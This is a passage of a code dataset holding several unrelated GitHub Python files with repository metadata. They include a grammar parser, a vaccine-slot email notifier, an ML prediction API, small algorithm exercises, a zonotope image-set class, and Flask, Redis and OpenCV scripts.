*args: mn_(AInplaceMul, *args)),\n 'a_stmt(_/=_)': (lambda *args: mn_(AInplaceDiv, *args)),\n 'a_stmt(_%=_)': (lambda *args: mn_(AInplaceMod, *args)),\n 'a_stmt(_&=_)': (lambda *args: mn_(AInplaceBitAnd, *args)),\n 'a_stmt(_|=_)': (lambda *args: mn_(AInplaceBitOr, *args)),\n 'a_stmt(_^=_)': (lambda *args: mn_(AInplaceBitXor, *args)),\n 'a_stmt(_<<=_)': (lambda *args: mn_(AInplaceShiftLeft, *args)),\n 'a_stmt(_>>=_)': (lambda *args: mn_(AInplaceShiftRight, *args)),\n 'a_stmt(if)': (lambda *args: mn_(AIf, *args)),\n 'a_stmt(case)': (lambda *args: mn_(ACase, *args)),\n 'a_stmt(for)': (lambda ctx, loc, v, e, b:\n AFor(\n AId(v.value()).set_location(\n *make_location(ctx, v.position())\n ),\n e, b\n ).set_location(*make_location(ctx, loc))\n ),\n 'a_stmt(while)': (lambda *args: mn_(AWhile, *args)),\n 'a_stmt(do-while)': (lambda *args: mn_(ADoWhile, *args)),\n 'a_stmt(break)': (lambda *args: mn_(ABreak, *args)),\n 'a_stmt(continue)': (lambda *args: mn_(AContinue, *args)),\n 'a_stmt(return)': (lambda *args: mn_(AReturn, *args)),\n 'a_stmt(return(expr))': (lambda *args: mn_(AReturnWithValue, *args)),\n 'a_expr(_||_)': (lambda *args: mn_(ALogOrExpr, *args)),\n 'a_expr(_&&_)': (lambda *args: 
mn_(ALogAndExpr, *args)),\n 'a_expr(_<_)': (lambda *args: mn_(ALtExpr, *args)),\n 'a_expr(_>_)': (lambda *args: mn_(AGtExpr, *args)),\n 'a_expr(_<=_)': (lambda *args: mn_(ALeExpr, *args)),\n 'a_expr(_>=_)': (lambda *args: mn_(AGeExpr, *args)),\n 'a_expr(_==_)': (lambda *args: mn_(AEqExpr, *args)),\n 'a_expr(_!=_)': (lambda *args: mn_(ANotEqExpr, *args)),\n 'a_expr(_|_)': (lambda *args: mn_(ABitOrExpr, *args)),\n 'a_expr(_&_)': (lambda *args: mn_(ABitAndExpr, *args)),\n 'a_expr(_^_)': (lambda *args: mn_(ABitXorExpr, *args)),\n 'a_expr(_<<_)': (lambda *args: mn_(AShiftLeftExpr, *args)),\n 'a_expr(_>>_)': (lambda *args: mn_(AShiftRightExpr, *args)),\n 'a_expr(_+_)': (lambda *args: mn_(AAddExpr, *args)),\n 'a_expr(_-_)': (lambda *args: mn_(ASubExpr, *args)),\n 'a_expr(_*_)': (lambda *args: mn_(AMulExpr, *args)),\n 'a_expr(_/_)': (lambda *args: mn_(ADivExpr, *args)),\n 'a_expr(_%_)': (lambda *args: mn_(AModExpr, *args)),\n 'a_expr(-_)': (lambda *args: mn_(ANegExpr, *args)),\n 'a_expr(~_)': (lambda *args: mn_(AInvExpr, *args)),\n 'a_expr(!_)': (lambda *args: mn_(ANotExpr, *args)),\n 'a_expr(_(_))': (lambda *args: mn_(ACallExpr, *args)),\n 'a_expr(_[_])': (lambda *args: mn_(AIndexExpr, *args)),\n 'a_expr(_.ID)': (lambda ctx, loc, lhs, rhs:\n AAccessExpr(\n lhs,\n AId(rhs.value()).set_location(\n *make_location(ctx, rhs.position())\n )\n ).set_location(*make_location(ctx, loc))\n ),\n 'a_expr_atom(ID)': (lambda *args: mn_(AId, *args)),\n 'a_expr_atom(INT)': (lambda *args: mn_(AIntLiteral, *args)),\n 'a_expr_atom(FLOAT)': (lambda *args: mn_(AFloatLiteral, *args)),\n 'a_expr_atom(STR)': (lambda *args: mn_(AStringLiteral, *args)),\n 'unwrap': self.on_unwrap\n }\n #-def\n\n def on_start(self, context, module):\n \"\"\"\n \"\"\"\n\n return module\n #-def\n\n def on_module(self, context, loc, name, module_units):\n \"\"\"\n \"\"\"\n\n node = DefModule(name.value(), module_units)\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_grammar(\n self, context, loc, name, grammar_type_spec, rules_and_commands\n ):\n \"\"\"\n \"\"\"\n\n node = DefGrammar(\n name.value(),\n [\n (x.value(), Location(*make_location(context, x.position())))\n for x in grammar_type_spec\n ],\n rules_and_commands\n )\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule(self, context, lhs, leftarrow, rhs):\n \"\"\"\n \"\"\"\n\n node = DefRule(lhs.value(), rhs, leftarrow.value() == \":\")\n node.set_location(*make_location(context, lhs.position()))\n return node\n #-def\n\n def on_rule_rhs_expr_alt(self, context, loc, lhs, rhs):\n \"\"\"\n \"\"\"\n\n node = lhs | rhs\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_sub(self, context, loc, lhs, rhs):\n \"\"\"\n \"\"\"\n\n node = SetMinus(lhs, rhs)\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_cat(self, context, loc, lhs, rhs):\n \"\"\"\n \"\"\"\n\n node = lhs + rhs\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_star(self, context, loc, lhs):\n \"\"\"\n \"\"\"\n\n node = lhs['*']\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_plus(self, context, loc, lhs):\n \"\"\"\n \"\"\"\n\n node = lhs['+']\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_opt(self, context, loc, lhs):\n \"\"\"\n \"\"\"\n\n node = lhs['?']\n node.set_location(*make_location(context, loc))\n return node\n 
#-def\n\n def on_rule_rhs_expr_neg(self, context, loc, rhs):\n \"\"\"\n \"\"\"\n\n node = -rhs\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_inv(self, context, loc, rhs):\n \"\"\"\n \"\"\"\n\n node = ~rhs\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_label(self, context, loc, lhs, rhs):\n \"\"\"\n \"\"\"\n\n node = lhs % rhs\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_atom_var(self, context, t):\n \"\"\"\n \"\"\"\n\n node = Var(t.value())\n node.set_location(*make_location(context, t.position()))\n return node\n #-def\n\n def on_rule_rhs_expr_atom_str(self, context, t):\n \"\"\"\n \"\"\"\n\n v = t.value(True)\n if v == \"\":\n node = Epsilon()\n elif len(v) == 1:\n node = Sym(v)\n else:\n node = Literal(v)\n node.set_location(*make_location(context, t.position()))\n return node\n #-def\n\n def on_rule_rhs_expr_atom_range(self, context, t, u):\n \"\"\"\n \"\"\"\n\n if len(t.value()) != 1:\n raise GlapSyntaxError(context,\n \"Character was expected\", t.position()\n )\n if len(u.value()) != 1:\n raise GlapSyntaxError(context,\n \"Character was expected\", u.position()\n )\n if ord(t.value()) > ord(u.value()):\n raise GlapSyntaxError(context,\n \"Invalid range literal (%r > %r)\" % (t.value(), u.value()),\n t.position()\n )\n a = Sym(t.value())\n a.set_location(*make_location(context, t.position()))\n b = Sym(u.value())\n b.set_location(*make_location(context, u.position()))\n node = Range(a, b)\n node.set_location(*make_location(context, t.position()))\n return node\n #-def\n\n def on_rule_rhs_expr_atom_epsilon(self, context, loc):\n \"\"\"\n \"\"\"\n\n node = Epsilon()\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_atom_action(self, context, loc, actions):\n \"\"\"\n \"\"\"\n\n l = make_location(context, loc)\n action = ABlock(actions)\n action.set_location(*l)\n node = Action(action)\n node.set_location(*l)\n return node\n #-def\n\n def on_unwrap(self, context, command):\n \"\"\"\n \"\"\"\n\n if self.inmacro:\n raise GlapSyntaxError(context, ie_(\"Unfinished macro definition\"))\n elif self.procedure_nesting_level != 0:\n raise GlapSyntaxError(\n context, ie_(\"Unfinished function definition\")\n )\n kind = command.kind\n if kind < 0:\n raise GlapSyntaxError(context, ie_(\"Unspecified node\"))\n elif kind <= GlapCompileCmdHelper.VARIABLE:\n unwrapped = []\n unwrapped.extend(command.code)\n if kind != GlapCompileCmdHelper.ASSIGN_EXPR:\n unwrapped.append(command.value_expr())\n return unwrapped\n elif kind <= GlapCompileCmdHelper.DEFINE_STATEMENT:\n return [command.value_expr()]\n raise GlapSyntaxError(context,\n ie_(\"Macro nodes was detected outside macro definition scope\")\n )\n #-def\n\n def run(self, action, context, *args):\n \"\"\"\n \"\"\"\n\n if action not in self.actions:\n raise ParsingError(\"Action %r does not exist\" % action)\n return self.actions[action](context, *args)\n #-def\n#-class\n\nclass GlapReader(Reader):\n \"\"\"\n \"\"\"\n __slots__ = []\n\n def read(self, source, *args, **opts):\n \"\"\"\n \"\"\"\n\n data, name = self.load_source(source, **opts)\n if data is None:\n return None\n ctx = GlapContext()\n GlapStream(ctx, name, data)\n GlapLexer(ctx)\n GlapParser(ctx)\n GlapActions(ctx)\n #-def\n#-class\n\ndef get_reader_class():\n \"\"\"\n \"\"\"\n\n return 
GlapReader\n#-def\n","repo_name":"i386x/doit","sub_path":"doit/text/pgen/readers/glap/bootstrap/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":61796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"28972148675","text":"import config\r\nimport time\r\nimport requests\r\nfrom datetime import date, timedelta\r\nimport smtplib\r\n\r\nuname = config.uname\r\nemail = config.email\r\ndistrict_id = str(config.district_id)\r\nvaccine_type = config.vaccine_type\r\nfee_type =config.fee_type\r\nage_limit = config.age_limit\r\nif age_limit < 45:\r\n age_limit = 18\r\nelse:\r\n age_limit = 45\r\n\r\nisUserNotified = config.isUserNotified\r\ndate_api = []\r\npayload = []\r\navailable_flag_break = config.available_flag_break\r\nattempt = config.attempt\r\nwait_time = config.wait_time\r\n\r\ndef sendmail(payload, email):\r\n def smtp(email, body):\r\n print(\"Sending mail to \" + email)\r\n SMTP_USER_NAME = config.SMTP_USER_NAME\r\n SMTP_PASSWORD = config.SMTP_PASSWORD\r\n SMTP_SERVER = config.SMTP_SERVER\r\n SMTP_PORT = config.SMTP_PORT\r\n TO = email\r\n TEXT = body\r\n SUBJECT = \"Automation Message for the COWIN Vaccine Notifier\"\r\n \r\n smtpserver = smtplib.SMTP(SMTP_SERVER, SMTP_PORT)\r\n smtpserver.ehlo()\r\n smtpserver.starttls()\r\n smtpserver.ehlo\r\n smtpserver.login(SMTP_USER_NAME, SMTP_PASSWORD)\r\n header = 'To:' + TO + '\\n' + 'From: ' + SMTP_USER_NAME\r\n header = header + '\\n' + 'Subject:' + SUBJECT + '\\n'\r\n msg = header + '\\n' + TEXT + '\\n\\n'\r\n smtpserver.sendmail(SMTP_USER_NAME, TO, msg)\r\n smtpserver.close()\r\n print(\"Email sent successfully to \" + email)\r\n\r\n def ulify(payload):\r\n string =\"Hi \"\r\n string += uname\r\n string += \"\\n\\nThis is the automation mail send from COWIN Vaccine Notifier\\n\\n\"\r\n string += \"\\n\".join([str(s) for s in payload])\r\n string += \"\\n\\nLink for COWIN Vacination Portal: https://www.cowin.gov.in \\nPS: Since your automation was successfully completed, the script was terminated.\\n\\nThank you for using COWIN Vaccine Notifier.\"\r\n return string\r\n \r\n body = ulify(payload)\r\n smtp(email, body)\r\n\r\nfor ba in range(attempt):\r\n date_api.append( (date.today()+timedelta(days=ba)).strftime(\"%d-%m-%Y\") ) \r\n\r\ndef main():\r\n global isUserNotified\r\n global available_flag_break\r\n\r\n while (isUserNotified == 0):\r\n for b in range(attempt):\r\n if available_flag_break == 0 or isUserNotified == 0:\r\n exit\r\n\r\n if available_flag_break == 0 or isUserNotified == 0:\r\n curl = \"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByDistrict?district_id=\"+district_id+\"&date=\"+str(date_api[b])\r\n user_agent = {'User-agent': 'Mozilla/5.0'}\r\n x = requests.get(curl, headers = user_agent)\r\n data = x.json()\r\n vax = data['centers']\r\n for i in vax:\r\n for j in i['sessions']:\r\n if j['vaccine'] == vaccine_type and i['fee_type'] == fee_type and j['available_capacity'] > 0 and j['min_age_limit'] == age_limit and j['date'] == date_api[b]:\r\n count = j['available_capacity']\r\n name = i['name']\r\n date = j['date']\r\n p = \"There are \",count,\" \",vaccine_type,\" available in \",name,\" on \",date\r\n pp = ''.join(str(p) for p in p)\r\n print(p)\r\n payload.append(pp)\r\n isUserNotified = 1\r\n available_flag_break = 1\r\n break\r\n sendmail(payload, email) \r\n print(\"going to sleep for {} minutes.\".format(wait_time/60))\r\n time.sleep(wait_time)\r\n","repo_name":"guruhariharaun/CoWIN-Vaccine-Notifier","sub_path":"automate.py","file_name":"automate.py","file_ext":"py","file_size_in_byte":3667,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"960713365","text":"from typing import Union\nimport uvicorn\nfrom fastapi import FastAPI, File, UploadFile\nfrom fastapi.middleware.cors import CORSMiddleware\nimport numpy as np\nfrom io import BytesIO\nfrom PIL import Image\nimport tensorflow as tf\nimport requests\nfrom flask_cors import CORS\napp = FastAPI()\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n# specify the correct endpoint\nendpoint = \"http://localhost:8504/v1/models/saved_model:predict\"\nCLASS_NAME = [\"early blight\", \"late blight\", \"healthy\"]\n\n@app.get(\"/ping\" )\nasync def ping():\n return \"pinging..\"\n\n\ndef readFileAsImage(data) ->np.ndarray:\n #convert the uploaded file to numpy array\n image = np.array(Image.open(BytesIO(data)))\n return image\n\n\n@app.post(\"/predict\")\nasync def predict(file: UploadFile = File(...)):\n image = readFileAsImage(await file.read())#await helps the system to handle multiple requests\n img_batch = np.expand_dims(image, 0)#remember the model takes a batch image as input but here we are provinding only one image. so we expand dimensions \n json_data = {\n \"instances\": img_batch.tolist()\n }\n response = requests.post(endpoint,json=json_data)\n prediction = np.array(response.json()[\"predictions\"][0])\n \n predicted_class = CLASS_NAME[np.argmax(prediction)]\n confidence = np.max(prediction)\n\n return {\n \"class\": predicted_class,\n \"confidence\": float(confidence)\n }\n\ndef application(environ, start_response):\n if environ['REQUEST_METHOD'] == 'OPTIONS':\n start_response(\n '200 OK',\n [\n ('Content-Type', 'application/json'),\n ('Access-Control-Allow-Origin', '*'),\n ('Access-Control-Allow-Headers', 'Authorization, Content-Type'),\n ('Access-Control-Allow-Methods', 'POST'),\n ]\n )\n return ''\n\nif __name__ == \"__main__\":\n uvicorn.run(app,host='localhost',port=8060)","repo_name":"NelsonMbogori/fastApi-MAchineLearning","sub_path":"maintfserving.py","file_name":"maintfserving.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"36404104877","text":"# https://www.acmicpc.net/problem/18352\nimport sys\nfrom collections import deque\n\nn, m, k, x = map(int, sys.stdin.readline().split())\ngraph = [[] for _ in range(n + 1)]\ndistance = [-1] * (n + 1)\ndistance[x] = 0\n\nfor _ in range(m):\n a, b = map(int, sys.stdin.readline().split())\n graph[a].append(b)\n\nqueue = deque([x])\nwhile queue:\n v = queue.popleft()\n for i in graph[v]:\n if distance[i] == -1:\n queue.append(i)\n distance[i] = distance[v] + 1\n\ncheck = False\nfor i in range(1, n + 1):\n if distance[i] == k:\n print(i)\n check = True\n\nif check == False:\n print(-1)","repo_name":"graygreat/algorithm-study","sub_path":"BaekJoon/Searching/특정_거리의_도시_찾기_18352.py","file_name":"특정_거리의_도시_찾기_18352.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"23046737677","text":"#!/usr/bin/python3\nimport numpy as np\n\nclass ImageZono:\n # ImageZono class\n # Class for representing set of images using Zonotope\n # An image can be attacked by bounded noise. An attacked image can\n # be represented using an ImageZono Set \n # author: Sung Woo Choi\n # date: 9/30/2021\n\n # 2-Dimensional ImageZono\n # ====================================================================%\n # Definition of 2-Dimensonal ImageZono\n # \n # A ImageZono Z= is defined by: \n # S = {x| x = c + a[1]*V[1] + a[2]*V[2] + ... + a[n]*V[n]\n # = V * b, V = {c V[1] V[2] ... V[n]}, \n # b = [1 a[1] a[2] ... a[n]]^T \n # where -1 <= a[i] <= 1}\n # where, V[0], V[i] are 2D matrices with the same dimension, i.e., \n # V[i] \\in R^{m x n}\n # V[0] : is called the center matrix and V[i] is called the basic matrix \n # [a[1]...a[n] are called predicate variables\n # The notion of 2D ImageZono is more general than the original Zonotope where\n # the V[0] and V[i] are vectors. \n # \n # Dimension of 2D ImageZono is the dimension of the center matrix V[0]\n # \n # ====================================================================%\n # The 2D representation of ImageZono is convenient for reachability analysis\n\n def __init__(obj, V = np.array([]), # an array of basis images \n lb_image = np.array([]), # lower bound of attack (high-dimensional array)\n ub_image = np.array([])): # upper bound of attack (high-dimensional array)\n from engine.set.star import Star\n from engine.set.zono import Zono\n\n if V.size:\n assert isinstance(V, np.ndarray), 'error: an array of basis images is not an ndarray'\n\n obj.V = V\n [obj.numChannels, obj.height, obj.width] = obj.V[0].shape\n obj.numPreds = obj.V.shape[0] - 1\n\n center = obj.V[1,:,:,:]\n generators = obj.V[1:obj.numPreds + 1, :,:,:]\n center = center.reshape(-1,1)\n generators = generators.reshape(-1, obj.numPreds)\n\n Z = Zono(center, generators)\n [lb, ub] = Z.getBounds()\n\n # A box representation of an ImageZono\n # A convenient way for user to specify the attack\n obj.lb_image = np.array(lb).reshape((obj.numChannels, obj.height, obj.width))\n obj.ub_image = np.array(ub).reshape((obj.numChannels, obj.height, obj.width))\n return\n\n\n if lb_image.size and ub_image.size:\n assert isinstance(lb_image, np.ndarray), 'error: a lower bound of attack is not an ndarray'\n assert isinstance(ub_image, np.ndarray), 'error: a upper bound of attack is not an ndarray'\n\n if lb_image.shape != ub_image.shape:\n raise Exception('error: different sizes between lower bound image and upper bound image')\n\n obj.lb_image = lb_image\n obj.ub_image = ub_image\n\n if len(lb_image.shape) == 3:\n obj.numChannels = obj.lb_image.shape[0] # number of channels, e.g., color images have 3 channel\n obj.height = obj.lb_image.shape[1] # height of image\n obj.width = obj.lb_image.shape[2] # width of image\n elif len(lb_image.shape) == 2:\n obj.numChannels = 1\n obj.height = obj.lb_image.shape[0]\n obj.width = obj.lb_image.shape[1]\n else:\n raise Exception('image bounds need to be a tuple of three elements: numChannels, image width, image height')\n lb = obj.lb_image.reshape(-1,1)\n ub = obj.ub_image.reshape(-1,1)\n\n S = Star(lb=lb, ub=ub)\n obj.numPreds = S.nVar # number of predicate variables\n obj.V = np.reshape(S.V, (obj.numPreds + 1, obj.numChannels, obj.height, obj.width))\n return\n \n raise Exception('error: failed to create ImageZono')\n\n#------------------check if this function is working--------------------------------------------\n # evaluate an 
ImageZono with specific values of predicates\n def evaluate(obj, pred_val = np.matrix([])):\n # @pred_val: valued vector of predicate variables\n\n assert obj.V.size, 'error: the ImageZono is an empty set'\n assert pred_val.size[1] == 1, 'error: invalid predicate vector'\n assert pred_val.size[0] == obj.numPreds, 'error: inconsistency between the size of the predicate vector and the number of preeicates in the ImageZono'\n\n # check if all values of predicate variables are in [-1, 1]\n for i in range(obj.numPreds):\n if not (pred_val[i]<=1 and pred_val[i]>=-1):\n raise Exception('error: predicate values should be in the range of [-1, 1] for ImageZono')\n\n image = np.zeros((obj.numChannels, obj.height, obj.width))\n for i in range(obj.numChannels):\n image[i, :, :] = obj.V[1, i, :, :]\n for j in range(1, obj.numPreds + 1):\n image[i, :, :] = image[i, :, :] + pred_val[j-1] * obj.V[j, i, :, :]\n return image\n\n # affineMap of an ImageZono is another ImageZono\n # y = scale * x + offset\n def affineMap(obj, scale, offset):\n # @scale: scale coefficient [1 x 1 x NumChannels] array\n # @offset: offset coefficient [1 x 1 x NumChannels] array\n # return: a new ImageZono\n\n assert scale.size and not np.isscalar(scale) and scale.shape[0] == obj.numChannels, 'error: inconsistent number of channels between scale array and the ImageZono'\n \n if scale.size:\n new_V = scale * obj.V\n else:\n new_V = obj.V\n\n if offset.size:\n new_V[1, :, :, :] = new_V[1, :, :, :] + offset\n \n return ImageZono(new_V)\n\n # transform to Zono\n def toZono(obj):\n from engine.set.zono import Zono\n\n center = obj.V[1,:,:,:,]\n generators = obj.V[1:obj.numPreds + 1,:,:,:]\n\n center = center.reshape(-1, 1)\n generators = np.reshape(generators, (obj.height*obj.width*obj.numChannels, obj.numPreds))\n return Zono(center, generators)\n\n#------------------check if this function is working--------------------------------------------\n # transform to ImageStar\n def toImageStar(obj):\n from imagestar import ImageStar\n pred_lb = -np.ones((obj.numPreds, 1))\n pred_ub = np.ones((obj.numPreds, 1))\n\n C = np.hstack((np.eye(obj.numPreds), -np.eye(obj.numPreds))) \n d = np.hstack((pred_ub, -pred_lb))\n return ImageStar(obj.V, C, d, pred_lb, pred_ub, obj.lb_image, obj.ub_image)\n \n\n#------------------check if this function is working--------------------------------------------\n # contain, check if an ImageZono contain an image\n def contains(obj, image):\n # @image: input image\n # @bool = 1 if the ImageStar contain the image\n # 2 if the ImageStar does not contain the image\n\n n = image.shape\n if len(n) == 2: # one channel image\n assert obj.numChannels == 1 and n[1] == obj.height and n[2] == obj.width, 'error: inconsistent dimenion between input image and the ImageStar'\n y = image.flatten()\n elif len(n) == 3:\n assert n[0] == obj.numChannels and n[1] == obj.height and n[2] == obj.width, 'error: inconsistent dimenion between input image and the ImageStar'\n y = image.flatten()\n else:\n raise Exception('error: invalid input image')\n\n Z = obj.toZono()\n return Z.contains(y)\n\n # get Ranges\n def getRanges(obj):\n return [obj.lb_image, obj.ub_image]\n\n#------------------check if this function is working--------------------------------------------\n def is_p1_larger_p2(obj, p1, p2):\n # @p1: the first point = []\n # @p2: the second point = []\n # h: height, w: width, c: channel index\n\n # @b = 1 -> p1 > p2 is feasible\n # = 0 -> p1 > p2 is infeasible\n\n S = obj.toImageStar\n return S.is_p1_larger_p2(p1, p2)\n \n def 
__str__(obj):\n print('class: %s' % (obj.__class__))\n print('height: %s \\nwidth: %s' % (obj.height, obj.width))\n print('lb_image: [%sx%sx%s %s]' % (obj.lb_image.shape[0], obj.lb_image.shape[1], obj.lb_image.shape[2], obj.lb_image.dtype))\n print('ub_image: [%sx%sx%s %s]' % (obj.ub_image.shape[0], obj.ub_image.shape[1], obj.ub_image.shape[2], obj.ub_image.dtype))\n if len(obj.V.shape) == 4:\n print('V: [%sx%sx%sx%s %s]' % (obj.V.shape[0], obj.V.shape[1], obj.V.shape[2], obj.V.shape[3], obj.V.dtype))\n else:\n print('V: [%sx%sx%s %s]' % (obj.V.shape[0], obj.V.shape[1], obj.V.shape[2], obj.V.dtype))\n return 'numPreds: %s\\n' % (obj.numPreds)\n \n def __repr__(obj):\n return \"class: %s \\nnumChannels: %s\\nheight: %s\\nwidth: %s\\nlb_image:\\n%s\\nub_image: \\n%s\\nV: \\n%s\\nnumPred: %s\" % (obj.__class__, obj.numChannels, obj.height, obj.width, obj.lb_image, obj.ub_image, obj.V, obj.numPreds)\n\n\n\n\n","repo_name":"V2A2/StarV_temp","sub_path":"engine/set/imagezono/imagezono.py","file_name":"imagezono.py","file_ext":"py","file_size_in_byte":9164,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"18950976005","text":"##\n## EPITECH PROJECT, 2021\n## 109titration\n## File description:\n## main\n##\n\nimport sys\nfrom utils import *\nfrom calc import *\n\ndef titration(data):\n\tderive = calc_deriv(data)\n\tcalc_deriv_bis(derive, data)\n\tcalc_deriv_bis_estimation(derive, data)\n\ndef main():\n\tcheck_arguments()\n\tdata = load_csv_file()\n\ttitration(data)","repo_name":"Xantass/Project-Epitech","sub_path":"Semester_2/109titration/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"7686272889","text":"# -*- coding: utf-8 -*-\n\nfrom django.core.urlresolvers import reverse\nfrom django.utils.translation import ugettext as _\nfrom admin_tools.menu import items\nfrom jmb.core.admin.menu import register_menu\n\ncurrency_menu_item = items.MenuItem(\n _('project'),\n reverse('admin:app_list', kwargs={'app_label': 'project'}),\n children=[\n items.MenuItem(_('add project'), reverse('admin:project_project_add', )),\n items.MenuItem(_('list project'), reverse('admin:project_project_changelist', )),\n items.MenuItem(_('add task'), reverse('admin:project_task_add', )),\n items.MenuItem(_('list task'), reverse('admin:project_task_changelist', )),\n ]\n)\n\nregister_menu(currency_menu_item, 'project')\n","repo_name":"monkeybits/edilcloud-back","sub_path":"apps/project/jmenu.py","file_name":"jmenu.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"29052582314","text":"# 숫자가 쓰인 카드들이 N x M 형태로 놓여 있다. N은 행의 개수, M은 열의 개수\n# 먼저 뽑고자 하는 카드의 행 선택\n# 그 다음 선택된 행에 포함된 카드 중 가장 낮은 카드 뽑음\n# 처음 카드를 골라낼 행을 선택할 때, 이후에 해당 행에서 가장 숫자가 낮은 카드를 뽑을 것을 고려하여 최종적으로 가장 높은 숫자의 카드를 뽑을 수 있도록 전략 세움\n# 카드에 적힌 숫자는 1 이상 10,000 이하의 자연수\n# 행의 개수 N과 열의 개수 M이 공백을 기준으로 하여 각각 자연수로 주어짐(1 <= N, M <= 100)\n\nn, m = list(map(int, input().split()))\n\nresult = 0\n\nfor i in range(n):\n data = list(map(int, input().split()))\n min_value = min(data)\n result = max(result, min_value)\n\nprint(result)\n","repo_name":"ImWonYong/TIL","sub_path":"Algorithm/Greedy/3-3.py","file_name":"3-3.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"35782801024","text":"from flask import Flask, render_template, request\r\nfrom openpyxl import load_workbook, Workbook\r\nfrom datetime import datetime\r\n\r\napp = Flask(__name__)\r\n\r\n# Function to create or load the Excel file\r\ndef get_workbook():\r\n try:\r\n workbook = load_workbook(\"user_data.xlsx\")\r\n except FileNotFoundError:\r\n workbook = Workbook()\r\n sheet = workbook.active\r\n sheet.append([\"Name\", \"Email\", \"Employ Code\", \"Optical Message\", \"Date and Time\"])\r\n return workbook\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n\r\n@app.route('/submit', methods=['POST'])\r\ndef submit():\r\n name = request.form.get('name')\r\n email = request.form.get('email')\r\n emp_code = request.form.get('empCode')\r\n optical_message = request.form.get('opticalMessage')\r\n \r\n # Add the current date and time\r\n timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n\r\n workbook = get_workbook()\r\n sheet = workbook.active\r\n\r\n # Add the submitted data along with the timestamp to the Excel file\r\n sheet.append([name, email, emp_code, optical_message, timestamp])\r\n\r\n # Save the Excel file\r\n excel_file_name = \"user_data.xlsx\"\r\n workbook.save(excel_file_name)\r\n\r\n return render_template('index.html', message=\"Data saved successfully!\")\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"ImShehan/UserDataApplication","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"34613178159","text":"from redis import Redis\n\nclient = Redis()\nprint(client.ping())\nif client.ping():\n print(1111111111)\n\n\na = [2,3,4, 123,333, 1]\nb = (1,2,3,4,5)\nprint(zip(a, b))\na = list(zip(a, b))\nprint(a)\n\na = '2020-01-01 02:02:00'\nimport datetime\na = datetime.datetime.strptime(a, '%Y-%m-%d %X')\nprint(a)\nb = a + datetime.timedelta(hours=8)\nprint(b)\n\n\n","repo_name":"281234086/data_struct","sub_path":"redis_study/connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"28863125662","text":"import cv2\nimport numpy as np\n\ncap = cv2.VideoCapture(0)\nfourcc = cv2.VideoWriter_fourcc(*'mp4v')\n\nw = cap.get(cv2.CAP_PROP_FRAME_WIDTH);\nh = cap.get(cv2.CAP_PROP_FRAME_HEIGHT); \nout = cv2.VideoWriter('output.avi', fourcc, 15.0, (int(w),int(h)))\n\n\nwhile True:\n\tret, frame = cap.read()\n\n\tgray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\tout.write(frame)\n\n\tcv2.imshow('frame',frame)\n\tcv2.imshow('gray',gray)\n\n\tif cv2.waitKey(1) & 0xFF == ord('q'):\n\t\tbreak\n\ncap.release()\nout.release()\ncv2.destroyAllWindows()","repo_name":"LatentFreedom/ShoulderSurfingDetection","sub_path":"OpenCV_Exercises/VideoInput.py","file_name":"VideoInput.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
